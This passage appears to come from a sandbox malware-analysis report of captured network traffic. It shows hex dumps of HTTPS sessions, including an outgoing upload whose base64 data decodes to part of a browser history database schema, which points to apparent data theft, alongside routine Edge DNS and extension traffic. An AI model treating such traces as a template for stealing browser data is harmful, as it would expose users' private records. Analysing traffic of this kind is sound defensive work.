                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                2024-12-16 14:40:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:10 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                21192.168.2.749843162.159.61.34435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 128
                                                                                                                                                                                                                                                Accept: application/dns-message
                                                                                                                                                                                                                                                Accept-Language: *
                                                                                                                                                                                                                                                User-Agent: Chrome
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                Content-Type: application/dns-message
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                22192.168.2.749833142.250.181.654435088C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 154477
                                                                                                                                                                                                                                                X-GUploader-UploadID: AFiumC63VOvQiPFpJWwc9IcQDmFYDJbx2ZYKPk_7CoPD8sbhxpQYBVt93n1xgAFt1IxysaIT
                                                                                                                                                                                                                                                X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                                Date: Sun, 15 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                Expires: Mon, 15 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                Age: 81715
                                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                2024-12-16 14:40:09 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                2024-12-16 14:40:10 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
